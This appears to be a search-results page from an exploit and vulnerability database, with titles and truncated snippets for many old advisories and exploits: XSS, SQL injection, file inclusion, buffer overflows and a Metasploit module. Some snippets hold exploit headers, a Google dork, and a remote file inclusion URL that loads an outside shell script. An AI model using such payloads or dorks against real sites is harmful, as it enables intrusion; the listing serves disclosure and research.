56796 matches found
Camtron CMNC-200 IP Camera Denial of Service Vulnerability
No description provided by source. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long...
oracle application server discussion forum portlet Multiple Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/16048/info Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities. The following specific vulnerabilities were identified: The application is prone to a cross-site scripting...
MySQL AB Eventum 1.x list.php release Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issu...
agXchange ESM 'ucschcancelproc.jsp' Open Redirection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38879/info agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible...
Active PHP Bookmarks 1.1.2 APB_SETTINGS['apb_path'] Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21263/info Active PHP Bookmarks application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromis...
Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/26654/info Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application an...
Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution
No description provided by source. ?php / +-----------------------------------------------------------+ + Log1CMS 2.0ajaxcreatefolder.php Remote Code Execution + +-----------------------------------------------------------+ Web-App : Log1CMS 2.0 Vendor : http://log1cms.sourceforge.net/...
PCMAN FTP 2.07 STOR Command - Buffer Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: PCMAN FTP 2.07 STOR Command - buffer overflow Date: 18 Agosto 2013 Exploit Author: Christian Polunchis Ramirez https://intrusionlabs.org Contact: [email protected] Version: PCMAN FTP 2.07 STOR Command Tested on: Windows ...
AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: AspPired2 Poll = 1.0 MoreInfo.asp Remote SQL Injection Exploit Coded by : ajann Author : ajann Contact : : use IO::Socket; if@ARGV 3 print ======================================================================== // AspPired2 Poll = 1....
Gearbox Software Halo Game Server 1.06/1.07 Infinite Loop Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13728/info The Halo Game Server is prone to a denial-of-service condition. The issue arises when malformed data is sent to the game server, causing it to enter an infinite loop. This issue was reported to affect Halo Game...
pkexec Race Condition Privilege Escalation Exploit
No description provided by source. / Exploit Title: pkexec Race condition CVE-2011-1485 exploit Author: xi4oyu Tested on: rhel 6 CVE : 2011-1485 Linux pkexec exploit by xi4oyu , thx [email protected] Have fun �� U can reach us @ http://www.wooyun.org : / include include include include include include...
Easyzip 2000 3.5 - (.zip) 0day stack buffer overflow PoC exploit
No description provided by source. ?php / Easyzip 2000 v3.5 .zip 0day stack buffer overflow PoC exploit Author: mrme - http://net-ninja.net/ Download: http://www.thefreesite.com/ezip35.exe Platform: Windows XP sp3 Advisory: http://www.corelan.be:8800/advisories.php?id=10-032 Greetz to: Corelan...
Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit
No description provided by source. / :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered and Exploited by dun Star Downloader Free = v1.45 .dat Universal SEH Overwrite Exploit Vendor: http://www.stardownloader.co...
ADN Forum <= 1.0b Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -------------------------------------------------- ADN Forum = 1.0b Blind SQL Injection Exploit Discovered By: StAkeR - StAkeRathotmaildotit Discovered On: 01/10/2008 Download: http://sourceforge.net/projects/adnforum/...
TCPDF 4.5.036/4.9.5 'params' Attribute Remote Code Execution Weakness
No description provided by source. source: http://www.securityfocus.com/bid/39315/info TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code. An attacker can exploit this issue in conjunction with other latent vulnerabilities to execute arbitrary code with the...
RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities
No description provided by source. --------------------------------------------------- RASPcalendar 1.01 ASP Admin Login Vlunerabilities --------------------------------------------------- Author : Hackeri-AL Date : 06-11-2013 Vendor Homepage : http://www.rttucson.com/files.html Software link :...
TeamSpeak Server 2.0.23 Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/23933/info TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary scri...
Softek MailMarshal 4,Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass
No description provided by source. source: http://www.securityfocus.com/bid/3097/info At least two SMTP gateway products have been identified which contain flaws in the handling of restricted filetypes as attachments. An attacker can insert extraneous characters in the filename extension of a...
RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/17202/info Various RealNetworks products are prone to multiple buffer-overflow vulnerabilities. These issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote...
4CMS SQL Injection and Local File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/34355/info 4CMS is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting the SQL-injection issues could allow an...
RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC
No description provided by source. !/usr/bin/perl RealPlayer: Buffer overflow vulnerability / PoC CVE-2006-0323 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 RealNetworks Advisory http://service.real.com/realplayer/security/03162006player/en/ Federico L. Bossi Bonin...
phpcksec 0.2 'phpcksec.php' Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/32890/info The 'phpcksec' script is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected...
Opera 6.0.1/6.0.2 Arbitrary File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4834/info A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking ...
WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability
No description provided by source. S.W.A.T. Title: WebPortal = 0.7.4 fckeditor Remote Arbitrary File Upload Vendor: http://webportal.ivanoculmine.com/download.php?mid=14 Discover by : S.W.A.T. [email protected] Impact: Medium Fix: Disable It In The Config File ; Site: wWw.SvvaT.IR - Exploit:...
BestWebApp Dating Site login_form.asp msg Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/21158/info BestWebApp Dating Site is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. An attacker...
Apple Mac OS X 10 nidump Password File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2953/info A vulnerability exists in all versions of Apple MacOS X. It has been found to contain a vulnerability which could allow disclosure of passwords and other sensitive system information. nidump is a Mac OS X system...
sX-Shop (view_image.php) SQL Injection Vulnerability
No description provided by source. sX-Shop / viewimage.php SQL Injection Author : secret - [email protected] Homepage : http://swissfaking.net/ Date : 05 August, 2010 / // // // \ / // / / // \ / | / |/ / \ \ / / / / / , // / / / / / / , // | / / //// ///||// //////||// ||//|/ // sX-Shop ...
OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC
No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h include stdint.h ifdef WIN32 include winsock.h // htonl else include netinet/in.h endif define VER 0.1 define HEAPOVERSZ 512 define ITPHEAPOVERSZ 150000 define ALLOCSAMPLESZ 39 & 7 + 16 defi...
GNU GNATS 3.113 .1_6 Queue-PR Database Command Line Option Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8232/info A stack overflow vulnerability has been reported for the queue-pr utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option. Successful...
Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability
No description provided by source. Exploit Title: Joomla Component Seyret comseyret Date: 2010-06-26 Author: mlk Software Link: null Version: null Tested on: Linux,BSD and windows CVE : null Code : on paper Joomla Component Seyret comseyret - Local File Inclusion Vulnerability + Discovered by : m...
Apple Mac OS X Safari <= 2.0.3 (417.9.2) Multiple Vulnerabilities PoC
No description provided by source. !--- Safari 2.0.3 417.9.2 CELLSPACING Issue.. Discovered by: Tom Ferris tommyatsecurity-protocolsdotcom Tested on: Mac OS X 10.4.5 using Safari 03/16/2006 Security-Protocols.com Advisory: http://www.security-protocols.com/advisory/sp-xxx This program is free...
Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability
No description provided by source. Exploit Title: Visual MP3 Splitter & Joiner 6.1 .mp3 , .wav DoS Date: 9 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.maniactools.com/soft/mp3-splitter-joiner/index.shtml Version: 6.1 Tested on: Windows XP SP 2 CVE : N /A !/usr/bin/python User needs ...
Huawei HG866 Authentication Bypass
No description provided by source. Exploit Title: Huawei HG866 Authentication Bypass Date: Jun 14 2012 Exploit Author: hkm Vendor Homepage: http://www.huawei.com Version: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16 Tested on: HG866GTAVER.C, 01, 02 Advisory:...
obotix IP Camera M1 1.9.4 .7/M10 2.0.5 .2 eventplayer get_image_info_abspath Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/18022/info The Mobotix IP camera is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the device to properly sanitize user-supplied input. An attacker may leverage these issues t...
QContacts 1.0.6 (Joomla component) SQL injection
No description provided by source. Exploit Title: QContacts 1.0.6 Joomla component SQL injection Google Dork: inurl:/components/comqcontacts/ Date: Decembar/08/2011 Author: Don BalcanCrew & BalcanHack Software Link: http://www.latenight-coding.com/joomla-addons/qcontacts.html Version: 1.0.6 Teste...
Apple QuickTime 5.0 Content-Type Remote Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4064/info Apple QuickTime is a freely available media player. It runs on a number of platforms including MacOS and Windows 9x/ME/NT/2000/XP operating systems. Apple QuickTime For Windows does not perform sufficient bounds...
GMailSite 1.0.x Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16081/info GMailSite is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site...
SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/26142/info SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code...
mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability
No description provided by source. modsecurity = 2.1.0 ASCIIZ byte POST Rules Bypass Vulnerability http://www.php-security.org/MOPB/BONUS-12-2007.html Affected is modsecurity = 2.1.0 Detailed information Detailed information When modsecurity receives a request it parses it into web application...
rgboard <= 3.0.12 (rfi/xss) Multiple Vulnerabilities
No description provided by source. Rgboard 3.0.x Multiple Vulnerabilities RFI/XSS // Author:: e.wiZz! // Site:: www.balcanwarez.com // Contact:: N/A :D =========================================================== // Script :: Rgboard // Vulnerable version :: 3.0.0/3.0.12 // Not vulnerable :: 4.0 /...
w3bcms Gaestebuch 3.0.0 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qwPOST; use Getopt::Long; '/ -.- ------------------oOO------OOo----------------- | | | / / / / | | / / / / / / / / / / / | | // // / / / // / // / // | | ///,// /./,/, // | | Security Research...
dynpage <= 1.0 - Multiple Vulnerabilities (0day)
No description provided by source. ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | | | | | || / \ || | | | || ||// \/|/ http://www.exploit-db.com/moaub-7-dynpage-multiple-remote-vulnerabilities/ ''' - Title : DynPage Multiple Remote Vulnerabilities. - Affected...
ZyWALL 100 HTTP Referer Header - Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/29110/info ZyWALL 100 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an...
PANews 2.0 - Remote PHP Script Code Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'adminsetup.php...
PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
No description provided by source. google dork :powered by: profitCode exploite: http://url/index.php?proMod=http://shell.txt? discoverde by momo26 ;!!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V2.5 EE Remote File Inclusion +...
Demarc PureSecure 1.0.5 Authentication Check SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4520/info Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to being a generalized network monitoring solution. Snort is an open-source NIDS Network Intrusion Detection System. Demar...
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)
No description provided by source. @Kc57 Symantec Web Gateway = 5.0.3.18 Arbitrary Password Change require 'msf/core' class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initializeinfo= superupdateinfoinfo, 'Name' = Symantec Web Gateway = 5.0.3.18 Arbitrary Password...
PHP-Nuke 6.0 - Multiple Cross Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/6409/info It has been discovered that multiple PHP scripts used by PHP-Nuke are vulnerable to cross-sitescripting attacks. Due to insufficient sanitization of web requests it is possible for script code to be embedded in...
Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4575/info Apache Tomcat is a servlet container for use with the Java Servlet and JavaServer Pages technologies. Tomcat may be run on most UNIX and Linux variants as well as Microsoft Windows. Apache Tomcat ships with a...
Finjan SurfinGate 6.0/7.0 FHTTP Restart Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9478/info Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands using the FHTTP protocol through the management control port 3141/TCP. It has been reported...